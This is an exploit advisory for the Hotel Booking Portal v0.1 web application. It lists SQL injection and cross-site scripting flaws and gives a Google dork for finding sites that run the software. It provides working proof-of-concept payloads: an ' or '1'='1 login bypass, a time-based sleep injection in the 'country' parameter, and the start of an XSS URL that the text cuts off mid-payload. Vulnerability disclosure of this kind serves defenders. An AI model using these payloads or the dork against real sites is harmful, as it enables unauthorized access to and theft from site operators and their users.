# ----------------------------------------------------------- # _____ _ _ _ _ # / ____(_) | | | | | # | | _| |_ __ _ __| | ___| | # | | | | __/ _` |/ _` |/ _ \ | # | |____| | || (_| | (_| | __/ | # \_____|_|\__\__,_|\__,_|\___|_| # # ----------------------------------------------------------- # Hotel Booking Portal v0.1 Multiple Vulnerabilities # Google dork: "Made And Powered By Hotels Portal" # Bug discovered by Yakir Wizman, # Date 09/08/2012 # Download - http://sourceforge.net/projects/hbportal/ # ISRAEL # ----------------------------------------------------------- # Author will be not responsible for any damage. # ----------------------------------------------------------- # I. DESCRIPTION # ----------------------------------------------------------- # 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters. # 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter. # 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js # 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js # 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter. # # ----------------------------------------------------------- # II. PoC EXPLOIT # ----------------------------------------------------------- # 1). POST a form to login.php with the value of: # email set to : ' or '1'='1 # password set to : ' or '1'='1 # 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)=' # 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";